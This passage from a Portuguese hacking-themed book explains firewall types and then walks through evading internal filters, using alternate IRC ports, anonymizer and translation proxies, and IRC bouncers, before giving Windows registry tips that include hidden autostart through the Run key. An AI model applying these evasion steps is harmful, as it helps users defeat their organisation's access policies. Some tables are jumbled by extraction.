rede local e Internet, mas pode ser usado também para Rede local
X Rede local. Em princípio firewalls podem ser vistos como um par
de mecanismos: um que existe para bloquear o tráfego e outro que
existe para permitir o tráfego. Alguns firewalls dão maior ênfase ao
bloqueio de tráfego, enquanto outros enfatizam a permissão do
tráfego, o importante é configurá-lo de acordo com a política de
segurança da organização que o utiliza, estabelecendo o tipo de
acesso que deve ser permitido ou negado.

14.2 Podem funcionar da seguinte forma:

Os filtros de pacotes utilizam endereços IP de origem e de


destino, e portas UDP e TCP para tomar decisões de controle de
acesso. O administrador elabora uma lista de máquinas e serviços
que estão autorizados a transmitir datagramas nos possíveis
sentidos de transmissão (entrado ou saindo da rede interna), que é
então usada para filtrar os datagramas IP que tentam atravessar o
firewall. Um exemplo de política de filtragem de pacotes seria
permitir o tráfego de datagramas carregando mensagens de HTML e
DNS nas duas direções, tráfego Telnet só para pacotes saindo da
rede interna e impedir todos os outros tipos de tráfego.
A filtragem de pacotes é vulnerável a adulteração de
endereços IP e não fornece uma granularidade muito fina de
controle de acesso, já que o acesso é controlado com base nas
máquinas de origem e de destino dos datagramas.
Terrorismo Tecnológico 247
Aprenda Para Sobreviver

Na segunda categoria de firewalls, um gateway de circuitos atua


como intermediário de conexões TCP, funcionando como um TCP
modificado. Para transmitir dados, o usuário origem conecta-se a
uma porta TCP no gateway, que por sua vez, conecta-se ao usuário
destino usando outra conexão TCP. Para que seja estabelecido um
circuito o usuário de origem deve fazer uma solicitação para o
gateway no firewall, passando como parâmetros a máquina e o
serviço de destino. O gateway então estabelece ou não o circuito,
note que um mecanismo de autenticação pode ser implementado
neste protocolo.
Firewalls onde os gateways atuam em nível de aplicação
utilizam implementações especiais das aplicações desenvolvidas
especificamente para funcionar de forma segura. Devido a grande
flexibilidade desta abordagem ela é a que pode fornecer maior grau
de proteção. Por exemplo, um gateway FTP pode ser programado
para restringir as operações de transferência a arquivos fisicamente
localizados em um único host de acesso externo (bastion host).
Além disso, a aplicação FTP pode ser modificada para limitar a
transferência de arquivos da rede interna para a externa,
dificultando ataques internos.

14.3 Evasão de Firewall

Isto é conseguirmos ter algum acesso que, a princípio, não seria


permitido pelo firewall.com a instalação foram feitas regras para
impedir o acesso a determinadas portas e serviços, mas estas
regras não foram suficientes para isto e foi possível contornar a
negação do serviço.

Um exemplo notável: em um firewall, colocaram-se regras para


impedir o acesso dos usuários da rede interna ao Internet Relay
Chat (IRC), um serviço de bate-papo. Basicamente, fecharam-se as
portas definidas para este serviço - de 6667 a 7000. No entanto, um
Terrorismo Tecnológico 248
Aprenda Para Sobreviver

dos usuários descobriu um servidor de IRC que também permite


conexões pela porta 6660, não impedida pelo firewall, e,
configurando o cliente deste serviço para esta porta, conseguiu
evadir-se das regras do firewall.

Então o que acontece é que mesmo um firewall impedindo um


determinado tipo de acesso como, por exemplo, paginas
pornográficas, é possível mesmo assim acessá-las e é nisso que
consiste a evasão.

Estarei mostrando aqui como fazer isso se você estiver dentro da


rede isto é de dentro para fora e não de fora para dentro, porém é
possível e muito parecido.

14.4 Como fazer?

O Firewall é uma barreira baseada em regras e digamos que o


administrador colocou as seguintes: “impeça o acesso a todos os
sites que têm a palavra 'sexo' no meio”; ou “proíba todo acesso,
menos os acessos HTTP que passarem pelo proxy filtrador de
conteúdo sexo”. Destruir essas regras estabelecidas é meio
complicado, mas é mais fácil enganá-las e fazer com que o
conteúdo se encaixe no que o firewall permite!

Então um IRC (bate-papo) - que responde a porta 6667,


quebrando esta presunção, isto é, acessando algum servidor de IRC
previamente preparado que escute por outra porta, estaremos
burlando esta regra e usando o bate papo do mesmo jeito!

Todo firewall pode ser enganado, pois pelo menos um tipo de


serviço ele tem que oferecer.

Deve-se fazer com que firewall imagine que está oferecendo um


serviço quando na verdade está oferecendo outro. No entanto,
Terrorismo Tecnológico 249
Aprenda Para Sobreviver

temos quatro pontos de encontro de nossos dados com o firewall: o


ponto em que ele chega no firewall, o ponto em que ele sai do
firewall para o mundo externo, o ponto em que ele volta do mundo
externo para o firewall e o ponto em que ele volta do firewall para o
nosso computador. e para cada um destes pontos, possivelmente,
precisaremos de conversores ou desconversores. Um Conversor
para tornar nossos dados que saem de inválidos para inválidos; um
desconversor para, já na rede externa, transformar nosso dado para
seu formato convencional, a fim de que o servidor/aplicativo de
destino possa entender; uma vez que a aplicação destino
respondeu, um reconversor para passar esta resposta como válida
no firewall; e um desconversor para, assim que o dado chega a nós,
conseguirmos entendê-lo.

Na realidade o conversor e desconversor da rede interna, assim


como o desconversor e reconversor da rede externa, são um
programa só.

No caso IRC; a única coisa que precisamos fazer é acessá-lo por


uma porta diferente da que ele está usando (6667).

Na pratica no mirc ou o aplicativo que estiver usando para salas


de bate-papo

Na tela de editar o provedor no nosso exemplo aparece assim:


Terrorismo Tecnológico 250
Aprenda Para Sobreviver

Agora é só mudar a porta ficando assim:


Terrorismo Tecnológico 251
Aprenda Para Sobreviver

Pronto é só conectar e o firewall nem percebera nada!

Mas no caso do cliente de IRC, o programa permitia mudar a


porta de conexão porém pode ser que não tenhamos esta facilidade
no programa que tivermos querendo usar. Aí sim que precisaremos
dos conversores!

14.5 Então vamos lá:

14.5.1 Enganando o impedimento de sites


pornográficos através do nome.

O administrador programou o seu firewall para impedir o acesso


pela web quando aparece a palavra “sexo”.

Muito se pode discutir deste método, já que muitas vezes esta


palavra aparece em sites sem conteúdo pornográfico, mas em uma
matéria científica, por exemplo, mas mesmo assim o firewall a barra.

Neste caso teremos que usar um conversor mas é muito simples


pois na Internet a sites que fazem isso automaticamente e assim
não precisaremos configurá-lo, esses sites funcionam geralmente
para você ficar anônimo na rede ou para traduzir textos, porém
acabam funcionando também como conversores como o
http://www.anonymizer.com (proteção de privacidade) e
http://www.babelfish.com (tradução). A forma de funcionamento
básica é: você entra um endereço em um formulário do site, e o site
faz todas as requisições HTTP pra você, repassando como se
fossem locais dela.
Terrorismo Tecnológico 252
Aprenda Para Sobreviver

E pronto conteúdo liberado!

14.5.2 Endereços WWW proibidos por nome.

Todas as transações ocorrem de forma completamente correta


para o firewall. O browser web conecta-se no site
http://www.anonymizer.com - que é permitido - e o usuário entra um
URL no formulário do site: http://www.sexo.com O próprio site do
anonymizer faz as requisições para o site pornográfico, assim como
carregar todas as figuras. Isto está na rede externa, fora do controle
do firewall. E repassa para o cliente com os links modificados, como
se fosse uma página local de http://www.anonymizer.com

14.6 Como bloquear então?


Então se você é o administrador como bloquear? Simploes
bloqueie os sites de conversão, pelo menos os mais
http://www.anonymizer.com e http://www.babelfish.com

Porém nunca estará 100% seguro, a não ser que passe o resto
da vida buscando sites que façam a conversão!

É muito mais fácil ir pedindo pra todo mundo e explicando que


não se pode entrar nesses sites e dar bons motivos para que os
usuários não acessem, e se tiver tempo faça uma promessa, pois
vai ser difícil!
Terrorismo Tecnológico 253
Aprenda Para Sobreviver

14.7 O mais utilizado é o IRC vamos estudá-lo


um pouco mais!

IRC - Internet Relay Chat, definido pelo RFC 1459, mas com
várias extensões usadas atualmente, foi um protocolo criado por
Jarkko Oikarinnen em 1989 para estender o protocolo talk do Unix a
uma interface mais poderosa de conferências e conversação virtual.
Trata-se de uma conversação em um ambiente distribuído com
vários usuários simultâneos, espalhados por vários servidores
interligados entre si.

Define porta (TCP) acima de 1024 do programa cliente com a


porta 6667 do programa servidor.

Com a popularização, o IRC passou a adotar outras portas no


servidor: de início, 6667 a 7000; algum tempo depois, perdeu-se o
padrão - qualquer porta acima de 1023 era usada para definir um
servidor. Como exemplos, temos a rede BrasNET de IRC, brasileira,
que também utiliza para todos os servidores as portas 8000 e 9000,
e inúmeras portas “não-oficiais” adotadas pela maioria dos
servidores, como 4400, 8888 e 31337. Uma lista de servidores com
suas respectivas portas pode ser obtida de sites como
http://www.irchelp.org.

Vai ser um pouco difícil o administrador ter proibido todas as


portas então é só procurar uma, geralmente ele só proíbe a 6667
mesmo.

14.7.1 Mas e se o provedor de IRC só funcionar


pela porta 6667?

Então temos que usar um servidor PROXY de IRC. Para saber


mais sobre o Proxy consulte uma parte só dele, neste mesmo livro!
Terrorismo Tecnológico 254
Aprenda Para Sobreviver

Um cliente de IRC, situado dentro do firewall, que seja


modificado para oferecer suporte a um proxy de IRC. Na prática,
quase todos os clientes de IRC têm esta modificação.

Um servidor Proxy de IRC, alcançável por uma porta liberada


pelo firewall, na rede externa. Consideraremos tanto servidores
públicos - que existem com esta exata finalidade - quanto um
servidor que o interessado na evasão tenha configurado, na internet,
para redirecionador suas conexões. (um pequeno detalhe - um
proxy de IRC também é chamado de “bouncer”, ou quicador)
Consideraremos que o bouncer ouve pela porta 1080, uma porta
comum para Proxies de IRC.

O servidor de IRC, na rede externa, que será alcançado pelo


Proxy de IRC na porta 6667.

14.8 E no caso do FTP?

O FTP é sem dúvida o mais complicado de todos! E isso se


deve, pois é o protocolo mais complexo e complicado do que todos
os outros protocolos da Internet. Para começar, envolve duas
conexões (uma de dados e uma de controle); depois o cliente
também pode ter que fazer papel de “servidor” - quando o cliente
pede um arquivo, o servidor diz para ele abrir determinada porta,
para então criar uma conexão de dados com o cliente e mandar o
arquivo.

Então a porta pela qual o cliente ouve é aleatória, acima de 1023,


e somente será aberta na ocasião da conexão. O Firewall teria que
deixar haver conexões com a rede interna de todas as portas de
usuário.
Terrorismo Tecnológico 255
Aprenda Para Sobreviver

Fora Interna Externa TCP >1023 >1023


Não Modo passivo,
(*) Criação de canal de
Direção Origem Destino Prot. Porta Porta Bit Comentário
dados para
de de TCP requisição de saída
Origem Destino ACK
Dentro Externa Interna TCP >1023 >1023 Sim Modo passivo,
Dentro Externa Interna TCP >1023 Não Requisição FTP
resposta da criação
21 (*) vindo
da requisição de
Fora Interna Externa TCP >1023 Sim saída à
Resposta
21 requisição
Fora Interna Externa TCP >1023 Não Modo normal,
(*) criação de canal de
20 dados
Dentro Externa Interna TCP >1023 Sim Modo normal,
resposta da criação
20 de canal de dados
Dentro Externa Interna TCP >1023 >1023 Não Modo passivo,
(*) criação de canal de
dados
Fora Interna Externa TCP >1023 >1023 Sim Modo passivo,
resposta da criação
de canal de dados
Fora Interna Externa TCP >1023 Não Requisição de saída
21 (*) de FTP
Dentro Externa Interna TCP >1023 Sim Resposta à
21 requisição de saída
Dentro Externa Interna TCP >1023 Não Modo normal,
(*) Criação de canal de
dados para
20 requisição de saída
Fora Interna Externa TCP >1023 Sim Modo normal,
resposta da criação
da requisição de
20 saída
Terrorismo Tecnológico 256
Aprenda Para Sobreviver

Vejamos no quadro!

(*) => Os pacotes subseqüentes virão com ACK ligado.

Bom a maneira de se fazer então é o Proxy, que tem conexão


direta com o servidor FTP, transformar a lista de arquivos em um
documento HTTP, e repassá-lo assim para o cliente.

Não há outra forma! Pelo menos até agora.

Existem muitas outras formas de se enganar o firewall


como o http por ppp, e outras mas essas apresentadas são
as mais fáceis de se fazer! Porém é só usar a criatividade
e imaginação para ver o que é possível!

14.9 Para o Administrador:

Nunca instale um firewall e mande-o configurar com


configurações padrão, e mesmo assim não confie totalmente nele já
que é facilmente burlavel, basta ter imaginação!

È mais fácil educar os usuários que proibir. Além de conseguir


resultados você não ficará com cara de chato, ou de tolo para os
que conseguirem te enganar!

De maneira alguma quero que isso seja usado para enganar,


para burlar sistemas, destruir reputações do firewall, só quero é
mostrar que eles são falhos e não é prova de segurança nenhuma!
Terrorismo Tecnológico 257
Aprenda Para Sobreviver

Capítulo XV

Registro E dicas de Windows


Terrorismo Tecnológico 258
Aprenda Para Sobreviver

15.1 O que é o registro do Sistema?

É um lugar oculto do Windows onde são armazenadas todas e


qualquer tipo de informação a respeito da configuração de seu
sistema(Win98/95/ME/NT/2000/XP), ou seja, tudo o que é feito é
também registrado no Regedit.

15.2 O que acontece?

Toda vez que você inicializa o sistema o Windows verifica


todas as configurações possíveis do Registro, como tipo de
hardware utilizado, software, configurações adicionais (papel de
parede, caminhos de arquivos, registros de softwares, configurações
de Internet, arquivos essenciais para inicialização do sistema. Por
isso ele também sabe se você acrescentou algum hardware no
sistema, ele compara suas tabelas)!

15.3 E como ele sabe?

É simples toda a vez que você desliga o seu computador o


sistema operacional vai ao Registro e atualiza todos os dados até
aquele exato momento. Pronto, feito isso até o seu último papel de
parede utilizado é registrado e também tudo aquilo que foi citado
acima. Feito isso o usuário já pode desligar o seu computador, e da
próxima vez que o sistema for carregado estará tudo no lugar e do
jeito que você configurou.

15.4 Então...
Terrorismo Tecnológico 259
Aprenda Para Sobreviver

O registro do Windows é muito fácil de ser explorado e


modificado. Primeiro você deve ir a INICIAR/EXECUTAR. Execute o
arquivo regedit.exe (digite regedit e Enter), abrirá uma janela, agora
é só editar o registro do seu S.O. Umas das ferramentas mais
utilizadas é a LOCALIZAR que fica no menu EDITAR, com ela você
pode localizar o que quiser e alterar o que quiser.

Vejamos algumas pastas do editor de registro (regedit.exe):

15.4.1 Hkey_Local_Machine

Contém informações específicas sobre o tipo de hardware,


software, e outras preferências de um determinado PC. Esta
informação é usada para todos os usuários que anotam sobre este
computador.

15.4.2 Hkey_Current_Config

Esta Chave aponta a uma filial do Hkey_Local_Machine \Config.


Chave que contém informação sobre a configuração de hardware
atual.

15.4.3 Hkey_Dyn_Data

Esta Chave aponta a uma filial de Hkey_Local_Machine que


contém vários pedaços de informações relativo à Tomada do
Sistema e configuração de Jogo. Esta informação é DINÂMICA e
Terrorismo Tecnológico 260
Aprenda Para Sobreviver

significa que pode mudar como dispositivos é somado ou é


removido do computador.

15.4.4 Hkey_Classes_Root

Esta Chave aponta a uma filial de Hkey_Local_Machine que


descreve certas colocações de software. Esta Chave contém
informação essencial sobre OLE e arrasta e derruba operações,
atalhos, e aspectos de caroço do Windows 95 GUI.

15.4.5 Hkey_Users

Esta Chave contém informação sobre os usuários que anotam


sobre o computador. Informação genérica e específica é usada, e
cada usuário que usa o sistema tem o próprio Subkey deles/delas.

15.4.6 Hkey_Current_User

Esta Chave aponta a uma filial de Hkey_Users para o usuário


que é atualmente anotado sobre o sistema.

15.4.7 Hkey_Local_Machine\Config

Contém informações sobre configurações de hardware


alternadas para o computador. Por exemplo, pode conter
informação sobre configurações múltiplas pode ser usado quando o
computador é conectado a uma rede, quando é undocked de uma
estação ancorando, e assim por diante. Cada configuração
Terrorismo Tecnológico 261
Aprenda Para Sobreviver

alternada é nomeada um identificador diferente, e esta configuração


ID têm um subkey debaixo da chave de Config. Cada configuração
aparece na lista de perfis de hardware na opção de sistema no
Painel de Controle.

15.4.8 Hkey_Local_Machine\Software

O subtree de Hkey_Local_Machine\Software contém informação


de configuração sobre tudos softwares que pode escrever
informação no Registro. As entradas nesta chave solicitam qualquer
um usando este computador de particular, e inclui definições para
associações de arquivo e informação de OLE. O subkey de software
contém, por exemplo, a informação você soma quando registrando
uma aplicação para usar uma extensão de filename específica e
informação somou durante instalaçãode aplicações Windows-
baseadas.

15.4.9 Hkey_Local_Machine\System

O dados em Hkey_Local_Machine\System são organizados em


jogos de controle que contêm um jogo completo de parâmetros para
os drives de dispositivo e serviços que podem ser carregados com
Windows 95. Todos os dados que controlam startup é descrito no
subtree de CurrentControlSet debaixo de
Hkey_Local_Machine\System. Este jogo de controle tem duas
partes:
A chave de Controle contém informações que controla startup de
sistema, inclusive o nome de cadeia do computador e o subsistema
começar. A chave de Serviços contém informações para controlar a
configuração de drives, sistemas de arquivo, e assim por diante. O
dados na chave de Serviços também controlam estes serviços e
chamam um ao outro.
Terrorismo Tecnológico 262
Aprenda Para Sobreviver

15.5 Antes de começar faça um backup

15.5.1 Como fazer o BACKUP DO REGISTRO?

Método 1:

1. Clique em Iniciar/Executar/Digite: Regedit/Enter.


2. Na janela do Editor de Registro clique no menu
Registro/Exportar Arquivo de Registro.
3. Agora de um nome para o arquivo que irá armazenar toda
o cópia do seu registro. (Sugestão: Registro).
4. Marque a opção Todos na caixa intervalo de exportação.
5. Indique o caminho onde esse arquivo será
armazenado(pode ser qualquer lugar, de preferência um que você
não esqueça).
6. Clique em OK e pronto, seu Registro está todo seguro.
Todas as suas configurações estão a salvo.

Método 2:

Uma outra forma é copiar da pasta System do Windows os


arquivos System.dat e User.dat, para um disquete ou outro lugar
qualquer. (Prefiro o 1º método).

15.5.2 Como recuperar o seu REGISTRO caso


seja danificado?

Bom, há várias maneiras de realizar a devida restauração do


registro de seu sistema caso tenha ocorrido algum desastre como
instalação de programas inconvenientes, exclusão de chaves ou
itens do registro, alteração indevida por parte de usuários não
Terrorismo Tecnológico 263
Aprenda Para Sobreviver

autorizados, problemas na inicialização do seu sistema e


formatação do disco rígido.

Método 1:

Computadores com o Win95/98/NT que inicializão, mas acusam


falta ou modificação de determinados arquivos ou uma ocorrência
de configuração desastrosa por parte do próprio usuário(o que mais
acontece) :

1. Clique em Iniciar/Executar/Digite: Regedit/Enter.

2. Na janela do Editor de Registro clique no menu


Registro/Importar Arquivo de Registro.

3. Busque o arquivo de backup que foi criado (se é que foi) e


clique em abrir. O conteúdo desse arquivo será adicionado ao
conteúdo do registro danificado.

4. Reinicie seu computador.

Método 2 :

1. Localize o arquivo de Backup e de um clique duplo em cima


dele. O seu conteúdo será adicionado ao Registro. (Um dos
métodos mais fáceis).
2. Reiniciar o seu micro.

Método 3:

Substituição do System.dat e User.dat :

1. Com posse dos devidos arquivos, você deve copiá-los para


dentro da pastam System do Windows.
Terrorismo Tecnológico 264
Aprenda Para Sobreviver

2. Reiniciar o seu micro.

Método 4:

Computadores com o Windows 95 instalado e que não possuem


Backup do Registro:

1. De um boot na máquina e entre no prompt do Dos.


2. Quando aparecer a mensagem iniciando o Windows 95 tecle
F8.
3. Entre no prompt do Dos

DIGITE:

CD C:\WINDOWS

DEPOIS DIGITE OS SEGUINTES COMANDOS,


PRESSIONANDO ENTER DEPOIS DE CADA.
(OBSERVE QUE SYSTEM.DA0 E USER.DA0 CONTÊM O NÚMERO ZERO)

attrib -h -r -s system.dat

attrib -h -r -s system.da0

attrib -h -r -s user.dat

attrib -h -r -s user.da0

4. Reinicie a máquina.

Método 5 :
Terrorismo Tecnológico 265
Aprenda Para Sobreviver

Computadores com o Windows 98 instalado e que não possuem


Backup do Registro:

1. De um boot na máquina.
2. Tecle CTRL até que apareça o menu de inicializações do
Windows 98.
3. Escolha somente prompt de comando.
4. Digite :
Scanreg/fix: se quiser restaurar a cópia da última inicialização do
sistema.

Scanreg/Restore: se optar por datas de inicializações sem


problemas. Ele oferece 4 opções de datas .(Para mim essa é a
melhor maneira).

Obs : Sempre que for preciso realizar a restauração dos Arquivos


do seu Registro você deverá reinicializar o sistema para que todas
as alterações sejam reconhecidas.

15.6 Dicas:

a- Abra o RegEdit (regedit.exe)


Mudando b- Localize por: {645FF040-5081-101B-9F08-
o nome da 00AA002F954E};
Lixeira c- Dê dois clicks em padrão e ALTERE O
NOME...
Tirando a- Abra o regedit.exe
itens b- Vá para seguinte pasta:
padrão da Hkey_Local_Machine\Software\Microsoft\Windo
Área de ws\CurrentVersion\explorer\Desktop\NameSpac
Trabalho e]
c- Lá você encontrará os items de sua área de
Quando o trabalho.
Win95 é d- Remova os que você quiser e PRONTO...
Terrorismo Tecnológico 266
Aprenda Para Sobreviver

instalado, MAS LEMBREM-SE: se você remover algum


ele cria ítem, não será mais possível recuperá-lo...
icones que
você não
consegue
remover da
área de
trabalho,
que é o
caso da
lixeira,
meu
computado
r, caixa de
entrada...
Se você
quer
removê-los
siga os
passos
abaixo:

Adicionan a - Abra o regedit.exe


do novas b- Abra a seguinte pasta:
dicas do H_KEY_LOCAL_MACHINE\Software\Microsoft\
dia para a Windows\
entrada CurrentVersion\explorer\Tips e pronto agora é
do só adicionar assim:
Win95/98/ c- Click no lado direito com o botão direito do
NT. mouse e selecione: novo e depois valor de
sequência
d- Numere-o (como 51, se adicionar outro, 52 e
assim por diante...)
e- Depois de um duplo click em DADOS e
escreva a dica...

Alterando a- Abra no regedit:


Terrorismo Tecnológico 267
Aprenda Para Sobreviver

o sistema HKEY_LOCAL_MACHINE\System\CurrentContr
de 16-bit olSet\ Control\FileSystem
para 32-bit b- Dê um duplo click no lado direito da tela com
(nomes o botão direito do mouse
longos em c- Escolha novo, valor binário
qualquer d- Nomeie-o de: NameNumericTail e dê enter
arquivo de e- Dê um duplo click no valor que você criou e
qualquer coloque 0 (zero) como valor binário completo.
software f- Click Ok e reinicie o Windows.
sendo 16
ou 32 bit).
Aqueles
nomes do
tipo Meus
~documen
tos.

Aumente a- Abra o regedit.exe


a b- Vá para seguinte pasta:
velocidad HKEY_CURRENT_USER\Control Panel\desktop
e do menu c- No lado direito da tela, click com o botão
INICIAR. direito do mouse, escolha NOVO, depois
VALOR DE
SEQUÊNCIA.
d- Nomeie esse valor de MenuShowDelay e
mude seu valor para um número de 1 à 10 (1 é
o mais rápido).

Mudando a- Abra o regedit.exe


nomes b- Abra
default de HKEY_CURRENT_USER\Software\Microsoft\M
usuários e S SETUP (ACME);
empresas. c- Você notará que no lado direito da tela tem os
seguintes valores de sequência: DefCompany
(empresa de ou de compania)
DefName (Nome de registro)
Terrorismo Tecnológico 268
Aprenda Para Sobreviver

- Para alterá-los basta dar dois clicks em cada...

MUDE OS a- Abra o regedit.exe


DADOS b- Vá em:
DO HKEY_LOCAL_MACHINE\SOFTWARE\MICRO
WINDOWS SOFT\JANELAS\CURRENT version
(Versão, c- Você notará que do lado direito da tela,
NOME, existem vários valores... Mude os que você
OEM . achar conveniente...
- Para modificar os ítems, basta dar dois clicks
sobre eles...

Mudando a- Abra o regedit.exe


o ícone do b- Mande localizar pelo nome: Meu Computador
Meu c- Aperte o TAB para ir para a chave binária e
Computad dê um duplo click na mesma...
or. d- vá para default icon e do lado direito da tela
aparecerá o local do ícone, é só trocar o
endereço para o que tem o ícone desejado.
Se você a- Abra o regedit.exe
deseja b- Vá para a seguinte pasta:
que HKEY_CURRENT_USER\Software\Microsoft\Wi
programa ndows\CURRENT_VERSION\RUN
s sejam c- Adicione um novo valor de sequência do lado
executado direito da tela, dando um click com o botão
s ao direito do mouse e escolhendo NOVO. Digite
iniciar o algum nome parecido com o programa.
Windows d- Depois de ter nomeado, de um duplo click em
sem que DADOS e coloque o endereço completo do
apareça arquivo.
no menu
INICIAR.
Se você a- Abra o regedit.exe
deseja b- Abra a seguinte pasta:
deixar um HKEY_CURRNT_USER\Software\Microsoft\Curr
diretório ent_Version\Explorer\User Shell Folders
com FIXO c- Criem um novo valor de sequência como
Terrorismo Tecnológico 269
Aprenda Para Sobreviver

para explicado no ítem acima.


salvar seu d- Nomeie-o de: Personal
document e- e edite seus dados colocando o edereço da
os e quer pasta desejada para se tornal DEFAULT
que todos
os
editores
de texto e
etc...
mandem
salvar
diretamen
te nele,
faça o
seguinte.
Desligand Abra RegEdit e selecione .
oa HKEY_CURRENT_USER, Control panel,
animação Desktop, WindowMetrics . Aperte o botão da
das direita do mouse num espaço vazio na janela da
janelas direita. . Selecione new, string value . Renomeie
Você pode o novo valor para MinAnimate . Dê duplo clique
desligar a em
animação MinAnimate e entre 0 (desliga animação) ou 1
mostrada (liga) . Feche Regedit e todos os programas e
quando reboot.
você
minimiza
ou
maximiza
janelas.
DICA 1- ABRA O msdos.sys no editor do msdos
especial: 2- Procure pela seção [opções]
SE VOCÊ 3- Acrecente a seguinte linha a essa seção:
QUER logo=0
QUE NÃO 4- Reinicie seu computador e então não terá
APAREÇA aquela tela...
MAIS Lembre-se que o padrão é "Logo1" ... se quiser
Terrorismo Tecnológico 270
Aprenda Para Sobreviver

AQUELA retornar a essa opção.


TELA
CHATA
DO
WIN95 AO
INICIAR
FAÇA O
SEGUINT
E:

Você já - Entre no regedit.exe


deve ter -Mande, por exemplo, localizar a chave da
percebido, lixeira: {645FF040-5081-101B-9F08-
que 00AA002F954E}, após isso, você verá que do
quando lado direiro da tela, existem dois valores, um é o
você Padrão e o outro é o InfoTip, dê dois clicks no
deixa o InfoTip e modifique-o, depois para conferir é so
mouse em ir ao desktop, deixar a lixeira selecionada e
cima de deixar o mouse sobre ela... Você pode fazer isso
algum com todos os ícones que tem esse InFoTip, e os
ícone na que não tiver, é só você criar, mandando colocar
desktop, um novo valor de sequência e nomeando-o de
aparece InfoTip...
quase que
uma
janela de
help
amarela
disendo o
que
aquele
ícone faz.
Se você
deseja
modificar
o mini
Terrorismo Tecnológico 271
Aprenda Para Sobreviver

help
desses
ícones,
faça o
seguinte:
Acabe 1. Execute o registro
com o 2. Abra as pastas na sequência:
Prompt de Meu
Logoff. Computador/HKEY_CURRENT_USER\Sotware\
Aquele do Mi
menu crosoft\Windows\CurrentVersion\Polices\Explore
iniciar r.
Efetuar Escolha Editar|Novo\Valor Binário. Nomeia a
Logoff de nova entrada como : NoLogoff. Pressione enter
<Nome- e defina o seguinte valor : 01 00 00 00. Pronto,
do- de um boot.
usuário>
Acabe 1. Abra o editor de Registro.
com o 2. Abra as pastas na sequência:
menu Meu
favoritosComputador/HKEY_CURRENT_USER\Sotware\
no Menu Mi
crosoft\Windows\CurrentVersion\Polices\Explore
Iniciar .
r.
Escolha Editar|Novo\Valor DWORD. Nomeia a
nova entrada como : NoFavoritesMenu.
Pressione enter e defina o seguinte valor : 01 00
00 00. Pronto, de um boot.
Recebe 1. Abra o editor de Registro.
mensagen 2. Abra as pastas na sequência
s do tipo HKEY_LOCAL_MACHINE\SYSTEM\CURRENT
Site Not CONTROLSET\SERVICES\VXD\MSTCP.
Found ? Escolha Editar|Novo\Valor da Sequencia.
Nomeia a nova entrada como : DefaultTTL
Clique com o botão direito do mouse sobre a
nova entrada e escolha modificar e digite 64.
Eliminar 1. Abra o editor de Registro.
Terrorismo Tecnológico 272
Aprenda Para Sobreviver

programa 2. Abra as pastas na sequência


s que HKEY_CURRENT_MACHINE\Software\Microsof
insistem t\Windows\CURRENT_VERSION\RUN
em Verifique se existem nomes suspeitos de
aparecer programas nessa chave. Você pode até mesmo
na deletar todos esses arquivos, o windows terá
incializaçãuma inicialização mais rápida .
o do Vela também : RunOnce, RunOnceEx,
Windows . RunServices e subkeys de RunServiceOnce. De
um clique duplo em cima deles e verá a sua
localização e para quais programas eles
apontam.
O CD dos 1. Abra o editor de Registro
Provedore 2. Apague as seguintes chaves :
s . Estes
Cds HKEY_LOCAL_MACHINE\Software\Microsoft\IE
entopem o 4\SETUP\ActiveXFiles.
registro
do HKEY_LOCAL_MACHINE\Software\Microsoft\A
windows ctiveSetup\Chanels.
com
programa HKEY_LOCAL_MACHINE\Software\Microsoft\A
s case ctiveSetup\ComponentProgress\IE4.
sempre
indesejáv HKEY_LOCAL_MACHINE\Software\Microsoft\IE
eis, 4\Options
vejamos HKEY_LOCAL_MACHINE\Software\Microsoft\A
como ctiveSetup\InstallInfo.
eliminá-
los HKEY_LOCAL_MACHINE\Software\Microsoft\A
manualme ctiveSetup\Jobs\Job.IE4.
nte .
HKEY_LOCAL_MACHINE\Software\Microsoft\A
ctiveSetup\Installed\Componentes\>{60B49E34
C7CC-11D0-8953-
00A0C90347FF}UOL3456UOL
Terrorismo Tecnológico 273
Aprenda Para Sobreviver

Página HKEY_LOCAL_MACHINE\Software\Microsoft\Int
Inicial. ernet Explorer\Main.
Você
poderá
altear a
página
inicial do
seu
navegador
.
Arquivos C:\Windows\System\Homepage.inf
Intrusos C:\Windows\System\Iedkcs32.dll
que são C:\Windows\System\User.dat
instalados C:\Windows\System\Wavemix.ini
no seu Faça um backup desses arquivos antes de
compotad instalar esses Cds de provedores depois é só
or por restaurar a configuração original com essas
estes Cds cópias.
de
provedore
s de
acesso
sem a sua
permição.
HKEY_LOCAL_MACHINE\Software\Microsoft\W
Modificar indows\CurrentVersion\Setup\SourcePath.
a origen Estando aí é só mudar o endereço dos arquivos
dos de instalação.
arquvos
de
configura
ção.
Alguma
vez já
tentou
instalar
um
Terrorismo Tecnológico 274
Aprenda Para Sobreviver

componen
te do
Windows
ou algúm
hardware
e ele te
perguntou
a caminho
dos
arquivos
de
instalação
do
Windows
? Veja
como
mudar.
Você rola HKEY_LOCAL_USER\Software\Microsoft\Office\
atela do 8.0\Word\Options.
Word e Escolha Editar|Novo\Valor da Sequencia.
nãao sabe Nomeia a nova entrada como : LiveScrooling
onde ela Clique com o botão direito do mouse sobre a
vai parar ? nova entrada e escolha modificar o valor e digite
Mude isso 1. Da próxima vez que tentar rolar a barra num
. arquivo grande o deslize será bem suave e
gradativo.

Adicionar a- Dê um click com o botão direito do mouse sob


um Painel o botão iniciar e escolha EXPLORAR;
de b- O explorer abrirá visualizando a pasta do
Controle menu iniciar;
ao seu c- Dê um click com o botão direito do mouse em
menu qualquer parte branca do lado direito da tela;
iniciar. d- Escolha "NOVO" e depois "PASTA";
e- Com isso você criou uma pasta chamada:
"NOVA PASTA";
f- Troque o nome "NOVA PASTA" para o
Terrorismo Tecnológico 275
Aprenda Para Sobreviver

seguinte código binário (ou se ja escreva tudo


que está a seguir
IGUALZINHO...) : Painel de
Controle.{21EC2020-3AEA-1069-A2DD-
08002B30309D}
g- Quando acabar aperte enter.
h- Feche o explorer e abra o menu iniciar
clickando no botão iniciar...

GOSTOU??? Você pode fazer isso com


qualquer coisa, Meu Computador, Rede Dial-up,
Impressoras... Basta
você ter o código binário correto... Como
conseguir esses códigos (e muitos outros...)? -
Abra o regedit.exe vá em
EDITAR, LOCALIZAR e localize por: 21EC2020.
ele lhe dará uma lista de VÁRIOS.

15.7 Dicas de Windows

Na Internet você poderá achar muito mais dicas de Windows,


estão repletas delas em sites, de hackers, e no próprio site da
Microsoft. Uma outra forma é você ler um livro de Windows, mas
boa parte dele só vai te enrrolar e não ensinar nada, veja só muitas
coisas que da para fazer com o win e que provavelmente você nem
sabia, é uma reunião do que tem de mais interessante nesses sites.

15.7.1 Retirando a tela inicial (logo)


Terrorismo Tecnológico 276
Aprenda Para Sobreviver

